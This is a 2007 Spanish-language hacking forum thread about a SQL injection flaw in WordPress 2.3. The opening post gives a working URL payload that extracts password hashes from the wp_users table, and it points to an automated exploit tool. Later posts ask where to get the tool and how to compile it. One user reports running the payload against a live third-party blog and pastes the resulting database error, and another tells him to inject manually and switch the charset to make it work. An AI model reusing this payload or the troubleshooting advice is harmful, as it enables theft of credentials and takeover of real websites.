SQL inyeccion en todas las versiones de wordpress menos la ultima :p

Iniciado por WHK, 16 Diciembre 2007, 05:44 AM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores.

Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL.

Ejemplo:

    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/  UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/    FROM/**/wp_users%23

Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos:
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/

Fuentes:
http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/
http://seclists.org/bugtraq/2007/Dec/0127.html
http://trac.wordpress.org/ticket/2394
http://seclists.org/bugtraq/2007/Nov/0274.html
http://h4ck1ng.net/index.php/topic,1036.0.html
http://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/

También está el pwnpress que hace todo el trabajo sucio automaticamente :P


http://www.info-pull.com/code.dynp


-sagitari-

#2
Cita de: hackpsycho en 16 Diciembre 2007, 21:49 PM
donde puedo descargar ese soft amigo?

No click&hack link re-"movido"

                                         

gasp

alguien sabe como puedo compilarlo ? en cke lo puedo compilar para cke salga en modo graffico como aparece en la imagen ?

consegui el code, pero esta en ruby ya lo compile pero nadamas no ckiere...



WHK

Necesitas una librería para poder ejecutarlo la cual no me acuerdo cual era, por eso me aburrí y lo borré :P

gasp

saludos, oie seria bueno cke recordaras esa libreria y asi poder buscarla, y poder compilar al cien ese  exploit o programa espero respuesta

aninhill

Lo probe en un blog de wordpress. No se que version es pero me responde esto:



WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND (((post_title LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#') OR (post_content LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#'))) AND post_type = 'post' AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10

Warning: Cannot modify header information - headers already sent by (output started at /home/jamiecar/public_html/wp-includes/wp-db.php:160) in /home/jamiecar/public_html/wp-includes/pluggable.php on line 391

sirdarckcat

tienes que hacer la inyeccion manualmente y cambiar el charset a latin.

Saludos!!